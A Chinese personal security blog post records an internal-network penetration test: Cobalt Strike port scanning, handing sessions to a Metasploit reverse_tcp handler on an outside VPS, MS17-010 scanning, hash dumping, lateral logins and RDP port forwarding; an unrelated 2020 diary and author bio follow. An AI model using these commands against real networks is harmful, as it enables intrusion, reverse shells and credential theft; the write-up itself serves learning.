利用cs+msf扩大内网战果
@ s1ye · Monday, Apr 1, 2019 · 2 · Apr 1, 2019

前言

由于处于接触内网渗透初期,所以对一些实战过程进行一些简单的记录,以巩固所学知识及工具的使用。

不谈论如何getshell,只从已经获取内网某台主机权限开始记录内网渗透的过程。

探测内网存活主机

利用portscan扫描内网存活的主机并探测开放的端口。

portscan 10.0.15.0/24 445,3389,139,80,8080 arp 10

(当时忘记截图,图为过后截的。)

大部分主机都开了445端口,因此先挂上msf骚一波内网的ms17-010。

MS17-010

外网msf监听服务器8989端口,在cs中设置windows/foreign/reverse_tcp,host填写msf的ip,port为msf监听的端口。

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost vps_ip
lhost => vps_ip
msf exploit(handler) > set lport 8989
lport => 8989
msf exploit(handler) > exploit -j

图片源自网络,侵删。

设置完成后,选中要反弹会话的目标主机,右键选择Spawn(增加会话),选择刚添加的监听器。msf服务器就会获得该目标主机的会话(meterpreter)。

查看路由,添加路由:

run get_local_subnets
run autoroute -s 10.0.15.0/24

扫描存在ms17010漏洞的主机

不知道为什么这里反弹shell没有成功,感觉msf自带的ms17010利用功能不太好用。

hashdump,getpass

利用cs抓取已获取权限主机(10.0.15.23)的密码或者hash(hash也可以利用)。读取完成后,选择10.0.15.11这台主机点击登录,利用.23这台主机的凭证登录,等一会发现11这台主机上线。

同样的方法内网近一半主机沦陷。

登录内网主机

准备登录到内网主机,对内网的其他机器进行渗透,大多服务器都开启了web服务,安装了远程控制软件等。可以利用常规web渗透手段对内网其他主机进行渗透,或者留后门键盘记录,嗅探等,来达到获取其他主机权限目的。感觉没必要太深入就到此为止了。

利用msf端口转发将内网的远程登陆端口转发出来。首先在webshell中找到远程连接的端口号。

tasklist /svc

找到TermService对应的pid。

netstat -ano

找到此pid对应的端口号,该端口号为远程登陆的端口号。

meterpreter > portfwd add -l 6868 -r 127.0.0.1 -p 3389 

提交漏洞通知管理人员。

总结

毫无技术含量的一次渗透,仅仅是熟悉了工具的使用,会沉淀更多的渗透技巧,分享并记录,以促进自己的学习。

仅此记录2020,艹

2020.06.11 学校突然说不给我毕业证,经查明有一门课任课老师忘记给录成绩,与学校多次协商无果,心情烦躁,工作也不是很顺心,决定辞职。

2020.06.18 正式离职,与学校老师以及领导继续对线,恰巧赶上hw想着去赚点钱好好休息一段时间再找下一份工作。

2020.06.19 北京疫情爆发,无法进京参加hw,在大连租住地边学习边跟学校继续对线。

2020.06.24 多次与老师和领导反应,互相踢皮球,老师叫我联系领导解决,领导叫我联系老师解决,最终将学校举报到省教育厅。

2020.06.28 由于省教育厅联系学校解决此事,端午节假期结束后第一时间,学校领导及任课教师开会重新讨论该事件,最终给予我审核通过,颁发毕业证。ps: 就离谱,我自己协商不同意,举报以后就管用了? : )

2020.07.25 期间一直在家里自己搞技术玩,厂商通知去吉林hw,收拾东西准备前往。

2020.07.26 大连疫情爆发,吉林厂商不允许大连相关人员入场,需要隔离14天。

2020.07.30 经过多天预约,终于做了核酸检测,收拾装备,准备离连。

2020.08.02 连夜回到家中,父母不在家,又是无尽的孤独。甚至保安见到我大连回来的躲得远远的,并且说了句“和他一栋楼的,完了!”,????

2020.08.16 总hw次日开始,抵达杭州,17号晚班8点开始。

2020.08.17 晚八点抵达工作地点,打开电脑,收到消息9点后redteam不允许攻击,随便看看流量就写代码去了。九点十分,甲方通知护网暂停,择日开启 : ) 。

2020.08-xx 过几天马上去成都了,“巴威”来了,我希望您别影响我飞机起飞,谢谢。

以后再hw我就是个sb,要不是学校的破事心烦不想立刻工作恰巧赶上了hw,想着呆着不如多赚点,我是万万不可能参加的。hw1.5时,歇逼两个月 :)

想去哪哪疫情,离开哪哪疫情,2020,当个人吧,求你了。

关于我

s1ye的❤️博客

平时会记录一些学习笔记或分享有趣的姿势

一个热爱技术的普通网络安全从业者

团队

所在团队🌈 :ChaBug

ID:s1ye(撕夜,)

可以通过email1联系我,

- 2020 年 2 月 8 日更新


  1. [email protected] ↩︎